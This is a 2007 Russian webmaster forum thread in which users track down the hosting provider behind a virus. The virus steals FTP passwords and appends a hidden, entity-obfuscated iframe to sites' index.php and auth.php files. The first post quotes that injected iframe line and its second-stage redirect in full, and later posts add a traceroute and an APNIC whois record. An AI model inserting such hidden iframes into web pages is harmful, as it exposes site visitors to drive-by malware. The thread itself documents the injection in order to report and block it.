Большой Воронежский Форум

Если это ваш первый визит, рекомендуем почитать справку по форуму. Для размещения своих сообщений необходимо зарегистрироваться. Для просмотра сообщений выберите раздел.
Вернуться   Большой Воронежский Форум » Компьютеры и все, что с ними связано » » Веб-дизайн
Что касается web-а... WebMaster-а Воронежа - объединяйтесь!

Ответ
 
Опции темы
Старый 15.08.2007, 14:54   #1   
feelthebeat
 
Аватар для Breathe
 
Сообщений: 765
Регистрация: 20.09.2003
Возраст: 41

Breathe вне форума Не в сети
Cool найти провайдера

Есть сайт alltraff.ru, который участвует в работе одного вируса. Суть вируса: распространяется по сети, тырит пароли от фтп, если находит на фтп index.php или auth.php, то добавляет в конец строку:
<iframe src='&#104&#116&#116&#112&#58&#47&#47&#97&#108&#108&#116&#114&#97&#102&#102&#46&#114&#117&#47&#105&#102&#114&#97&#109&#101&#46&#112&#104&#112' width='1' height='1' style='visibility: hidden;'></iframe>

В ней происходит запрос к файлу alltraff.ru/iframe.php, который возвращает:
<iframe src='http://google-counter.com/in.cgi?5' width='1' height='1' style='visibility: hidden;'></iframe>

ДНСники у сайта ns1.lexhost.info и ns2.lexhost.info, т.е. сервер чувак арендует. Как узнать кто ему доступ в инет предоставляет, чтобы обрубить нахрен всю эту потеху?
  Ответить с цитированием
Старый 15.08.2007, 15:11   #2   
Форумец
 
Аватар для Vital_N
 
Сообщений: 1,834
Регистрация: 04.04.2005

Vital_N вне форума Не в сети
не сделаешь ничего ты им
они походу далеко в азии где-то сидят

8 so-5-2-0-dcr1.amd.cw.net (208.173.211.237) 83.950 ms 81.134 ms 78.152 ms
9 as0-dcr2.amd.cw.net (195.2.10.154) 86.154 ms 81.073 ms 78.372 ms
10 so-4-0-0-dcr1.tsd.cw.net (195.2.10.146) 86.353 ms so-3-0-0-dcr1.tsd.cw.net (195.2.10.105) 83.708 ms 89.852 ms
11 so-4-0-0-bcr1.tsd.cw.net (195.2.10.57) 84.687 ms so-3-0-0-bcr1.tsd.cw.net (195.2.10.53) 85.674 ms so-4-0-0-bcr1.tsd.cw.net (195.2.10.57) 80.460 ms
12 ge-6-0-6.lon22.ip.tiscali.net (166.63.211.154) 84.671 ms 76.989 ms 86.362 ms
13 so-0-0-0.lax22.ip.tiscali.net (213.200.80.93) 217.511 ms 219.336 ms 218.306 ms
14 asia-netcom-gw.ip.tiscali.net (213.200.84.250) 225.545 ms 223.834 ms 229.439 ms
15 po0-0.cr2.nrt1.asianetcom.net (202.147.61.134) 339.036 ms 336.450 ms 342.775 ms
16 po5-2.cr1.hkg3.asianetcom.net (202.147.0.170) 390.969 ms 392.111 ms 394.598 ms
17 po15-0.gw2.hkg3.asianetcom.net (202.147.16.210) 390.452 ms 413.875 ms 391.750 ms
18 HFI-0002.gw2.hkg3.asianetcom.net (202.147.17.90) 520.431 ms 395.794 ms 400.798 ms
19 116.50.12.18 (116.50.12.18) 397.473 ms 402.452 ms 398.817 ms
20 116.50.12.14 (116.50.12.14) 399.987 ms 441.708 ms 396.679 ms
21 58.65.235.105 (58.65.235.105) 400.936 ms 396.451 ms 398.801 ms
  Ответить с цитированием
Старый 15.08.2007, 15:15   #3   
feelthebeat
 
Аватар для Breathe
 
Сообщений: 765
Регистрация: 20.09.2003
Возраст: 41

Breathe вне форума Не в сети
Кароче блин в Гон-Конге сервак у них стоит
inetnum: 58.65.232.0 - 58.65.239.255
netname: HOSTFRESH
descr: HostFresh
descr: Internet Service Provider
country: HK
admin-c: PL466-AP
tech-c: PL466-AP

D PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HK-HOSTFRESH
mnt-routes: MAINT-HK-HOSTFRESH
remarks: Please send Spam & Abuse report to
remarks: abuse@hostfresh.com
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object,

APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20060612
changed: hm-changed@apnic.net 20060613
changed: hm-changed@apnic.net 20061018
source: APNIC

person: Piu Lo

mail: ipadmin@hostfresh.com
address: Unit 2001, 20/F, New Tech Plaza,
address: 34 Tai Yau Street, San Po Kong, KLN
address: Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK
changed: ipadmin@hostfresh.com 20070710
mnt-by: MAINT-HK-HOSTFRESH
source: APNIC


Как думаете писать им?
  Ответить с цитированием
Старый 15.08.2007, 15:20   #4   
Форумец
 
Аватар для Vital_N
 
Сообщений: 1,834
Регистрация: 04.04.2005

Vital_N вне форума Не в сети
Breathe, они на тебя положат 99% )
все уроды , которые че нить в россии творят или продают кал всякий
хостятся за бугром - потому что ничего им никто не сделает никогда

я как-то пробовал вяским провам забугорным писать на спамеров жаловаться- ни ответа ни привета
так что это все без толку имхо
но попробовать конечно можно )
  Ответить с цитированием
Старый 15.08.2007, 15:23   #5   
feelthebeat
 
Аватар для Breathe
 
Сообщений: 765
Регистрация: 20.09.2003
Возраст: 41

Breathe вне форума Не в сети
Vital_N, регистратор alltraff.ru НАУНЕТ, сейчас веду переписку с ними. Может они что предпримут.
  Ответить с цитированием
Старый 15.08.2007, 15:25   #6   
Форумец
 
Аватар для Vital_N
 
Сообщений: 1,834
Регистрация: 04.04.2005

Vital_N вне форума Не в сети
Breathe, ну максимум, домена лишить можно наверное
сменят домен на .com или .ebu какой-нить - суть то останется (
  Ответить с цитированием
Старый 15.08.2007, 15:33   #7   
feelthebeat
 
Аватар для Breathe
 
Сообщений: 765
Регистрация: 20.09.2003
Возраст: 41

Breathe вне форума Не в сети
А если хостинга лишат, то тоже ничего страшного. Перейдут к другому фигли.

p.s. может зарубить IP на маршрутизаторе?
  Ответить с цитированием
Старый 15.08.2007, 15:52   #8   
Форумец
 
Аватар для Vital_N
 
Сообщений: 1,834
Регистрация: 04.04.2005

Vital_N вне форума Не в сети
ды можно конечно зафилтровать их нах )
а чем они тебе мешают кстати? чего-то конкретное тебе сделали?
  Ответить с цитированием
Поиск в теме: 



Быстрый переход:

  Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd. Перевод: zCarot
Support by DrIQ & Netwind